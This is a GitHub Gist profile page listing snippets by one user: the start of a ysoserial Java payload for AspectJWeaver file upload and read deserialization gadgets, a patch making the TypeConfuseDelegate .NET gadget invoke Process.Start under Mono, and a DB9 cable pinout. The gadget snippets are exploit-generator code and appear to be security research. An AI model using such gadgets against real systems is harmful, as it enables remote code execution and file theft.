Skip to content

Instantly share code, notes, and snippets.

View denandz's full-sized avatar

DoI denandz

171 followers · 0 following
View GitHub Profile
@denandz
denandz / AspectJWeaverFileRead1.java
Last active September 26, 2022 05:49
AspectJWeaver file upload and read deserialization gadgets
package ysoserial.payloads;
import org.apache.commons.io.FilenameUtils;
import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.aspectj.weaver.tools.cache.SimpleCache;
@denandz
denandz / TypeConfuseDelegate_mono.patch
Created October 6, 2019 21:04
Use Forshaw's TypeConfuseDelegate deserialization gadget with Mono - for ysoserial.net
diff --git a/ysoserial/Generators/TypeConfuseDelegateGenerator.cs b/ysoserial/Generators/TypeConfuseDelegateGenerator.cs
index 96bbea0..0f83ffa 100755
--- a/ysoserial/Generators/TypeConfuseDelegateGenerator.cs
+++ b/ysoserial/Generators/TypeConfuseDelegateGenerator.cs
@@ -46,6 +46,7 @@ namespace ysoserial.Generators
FieldInfo fi = typeof(MulticastDelegate).GetField("_invocationList", BindingFlags.NonPublic | BindingFlags.Instance);
object[] invoke_list = d.GetInvocationList();
// Modify the invocation list to add Process::Start(string, string)
+ invoke_list[0] = new Func<string, string, Process>(Process.Start);
invoke_list[1] = new Func<string, string, Process>(Process.Start);
@denandz
denandz / rollover_pinout.txt
Created September 12, 2018 22:06
Roll-over cable DB9 pinout
Ever butchered a console cable 'cause you needed a female DB9 connector for something like RIGHT NOW. Yea, me too...
Roll over cable DB9 pinout
Pin 1 - Orange
Pin 2 - Red
Pin 3 - Green
Pin 4 - Blue
Pin 5 - Yellow
Pin 6 - Brown